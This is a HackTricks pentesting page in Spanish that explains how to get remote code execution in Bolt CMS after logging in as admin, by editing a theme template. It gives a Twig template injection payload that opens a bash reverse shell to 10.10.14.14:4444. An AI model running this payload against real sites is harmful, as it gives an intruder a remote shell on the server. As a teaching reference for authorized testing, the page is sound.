mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-23 13:13:41 +00:00
34 lines
2.8 KiB
Markdown
34 lines
2.8 KiB
Markdown
|
# Bolt CMS
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||
|
|
||
|
* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
|
||
|
* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección de exclusivos [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
|
* Obtén el [**swag oficial de PEASS y HackTricks**](https://peass.creator-spring.com)
|
||
|
* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sígueme en** **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||
|
* **Comparte tus trucos de hacking enviando PR a los repositorios** [**hacktricks**](https://github.com/carlospolop/hacktricks) **y** [**hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||
|
|
||
|
</details>
|
||
|
|
||
|
## RCE
|
||
|
|
||
|
Después de iniciar sesión como administrador (ir a /bot para acceder al prompt de inicio de sesión), puedes obtener RCE en Bolt CMS:
|
||
|
|
||
|
* Selecciona `Configuration` -> `View Configuration` -> `Main Configuration` o ve a la ruta de URL `/bolt/file-edit/config?file=/bolt/config.yaml`
|
||
|
* Verifica el valor del tema
|
||
|
|
||
|
<figure><img src="../../.gitbook/assets/image (1) (1) (2) (3).png" alt=""><figcaption></figcaption></figure>
|
||
|
|
||
|
* Selecciona `File management` -> `View & edit templates`
|
||
|
* Selecciona la base del tema encontrada en el paso anterior (`base-2021` en este caso) y selecciona `index.twig`
|
||
|
* En mi caso, esto está en la ruta de URL /bolt/file-edit/themes?file=/base-2021/index.twig
|
||
|
* Establece tu carga útil en este archivo a través de [inyección de plantilla (Twig)](../../pentesting-web/ssti-server-side-template-injection/#twig-php), como: `{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}`
|
||
|
* Y guarda los cambios
|
||
|
|
||
|
<figure><img src="../../.gitbook/assets/image (3) (7).png" alt=""><figcaption></figcaption></figure>
|
||
|
|
||
|
* Limpia la caché en `Maintenance` -> `Clear the cache`
|
||
|
* Accede nuevamente a la página como usuario regular, y la carga útil debería ejecutarse
|